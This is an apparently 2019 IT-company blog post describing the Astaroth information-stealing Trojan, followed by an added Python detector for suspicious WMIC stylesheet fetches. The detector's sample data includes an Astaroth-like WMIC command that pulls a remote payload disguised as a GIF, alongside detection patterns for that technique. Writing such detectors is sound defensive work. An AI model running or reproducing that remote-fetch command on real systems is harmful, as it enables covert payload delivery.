FYI: The Astaroth Trojan

by

February 22, 2019

You might have heard recently that the Astaroth Trojan is making a comeback. We break down what it is, why it’s making a comeback and more…

Despite having a name that makes it sound like a lost Michael Crichton novel or a Swedish death metal band, the Astaroth Trojan is a nasty piece of code. The trojan was first detected in 2017 after it was used in multiple South American cyber attacks.

Historically delivered by email with malicious attachments, the Trojan uses the Windows Management Instrumentation Command-line tool (WMIC) to download and install its payload. It typically runs WMIC in non-interactive mode, which hides what it is doing from the end user.

To avoid detection, Astaroth hid in plain sight, using a seemingly safe domain with an additional URL snippet appended that points to its payload. Past versions, once installed, would scan for antivirus software and shut themselves down if any was found on the endpoint.

This new version behaves differently. The Trojan’s payload typically disguises itself as a JPEG, a GIF or an extension-less attachment. Once downloaded and opened, the new Astaroth Trojan actually leverages antivirus software, specifically Avast Free Antivirus, by injecting a malicious module into one of its processes. Once installed, the malware logs keystrokes, intercepts operating system calls and gathers other personally identifiable information in order to steal credentials and passwords.
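The three behaviours above (WMIC fetching the payload non-interactively, a legitimate-looking URL with a snippet tacked on, and a payload dressed up as an image) give a defender something concrete to hunt for in process-creation telemetry. The following is an added example written for this post, not code from Integris or from Cybereason's research. It assumes the WMIC invocation takes the shape `wmic ... /format:"<remote location>"` (WMIC's stylesheet argument, which will fetch a remote file); the post does not state the exact command line, so treat that shape, the field names, and the sample records as assumptions to adapt to your own EDR or Sysmon data.

```python
"""Flag WMIC invocations that pull a stylesheet from a remote location.

Added example for this post; it is not Astaroth's code nor Cybereason's
detection logic. The command shape it looks for (/format: pointing at a
URL or UNC path) is an assumption, not something stated in the post.
"""
import os
import re
from urllib.parse import urlparse

# Constructed sample process-creation records (made up for this example,
# not real Astaroth telemetry). Field names mimic a Sysmon-style event.
SAMPLE_EVENTS = [
    # Assumed Astaroth-like pattern: a "GIF" on a benign-looking CDN host,
    # with a fragment appended that names the real payload.
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": 'wmic os get /format:"https://cdn.example.com/assets/logo.gif#payload.xsl"'},
    # Ordinary administrative use: no stylesheet argument at all.
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": "wmic process list brief"},
    # Bare "wmic" opens the interactive console; nothing passed on the command line.
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": "wmic"},
    # Unrelated process, should never be considered.
    {"image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c dir"},
    # Stylesheet pulled from a network share instead of a URL.
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": r'wmic /format:"\\fileserver\share\style.xsl" os get'},
    # Built-in output format keyword, entirely local: benign.
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": "wmic os get /format:csv"},
]

# Captures the value of a /format: argument, quoted or not.
FORMAT_ARG = re.compile(r'/format:\s*"?([^"\s]+)"?', re.IGNORECASE)
IMAGE_EXT = re.compile(r"\.(gif|jpe?g)$", re.IGNORECASE)


def classify_wmic_event(event):
    """Return a finding dict for a suspicious WMIC event, else None."""
    if not event["image"].lower().endswith("\\wmic.exe"):
        return None
    cmd = event["command_line"]
    # A bare "wmic" drops into the interactive console. Astaroth's trick is
    # the opposite: everything is passed on the command line so the tool runs
    # non-interactively and shows the user nothing, so those are what we inspect.
    if len(cmd.split()) <= 1:
        return None
    match = FORMAT_ARG.search(cmd)
    if not match:
        return None
    target = match.group(1)
    reasons = []
    parsed = urlparse(target)
    if parsed.scheme in ("http", "https"):
        reasons.append(f"stylesheet fetched over {parsed.scheme} from {parsed.netloc}")
        # The "seemingly safe domain plus an extra snippet" pattern: the part
        # after '#' is not part of the visible file name.
        if parsed.fragment:
            reasons.append(f"URL carries a fragment '#{parsed.fragment}' after the file name")
        # Payload disguised as an image, or with no extension at all.
        if IMAGE_EXT.search(parsed.path):
            reasons.append("remote 'stylesheet' is named like an image file")
        elif not os.path.splitext(parsed.path)[1]:
            reasons.append("remote 'stylesheet' has no file extension")
    elif target.startswith("\\\\"):
        reasons.append(f"stylesheet loaded from UNC path {target}")
    if not reasons:
        return None  # local keyword such as csv/list/table: normal usage
    return {"command_line": cmd, "reasons": reasons}


def scan_events(events):
    """Run the classifier over a batch of records and keep the findings."""
    return [f for f in (classify_wmic_event(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding["command_line"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

Only two of the six constructed records are flagged: the remote HTTPS fetch with the image name and fragment, and the UNC-path fetch. Routine `wmic process list brief` and `/format:csv` pass untouched, which is the point: alert on where the stylesheet comes from, not on WMIC itself, or the rule drowns in administrative noise.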

Because Avast is one of the most widely used antivirus solutions on the planet, this could be a particularly nasty piece of malware.

The new variant was discovered by the fine folks who make up Cybereason’s Nocturnus Research team (also not a death metal band… I’m starting to see a trend here… hmmm…).

You can read more about Astaroth here (https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil) on Cybereason’s blog. We’ll keep you up to date if we hear anything else regarding Astaroth. Until then, if you’re using Avast we recommend you try something different. We personally recommend Cybereason’s EDR platform or CylancePROTECT.

Have anything you’d like to share regarding this topic? Let us know by leaving a comment.

Interested in learning more about Integris? Download our free Intelligence in Depth guide today!

Carl Keyser is the Content Manager at Integris.
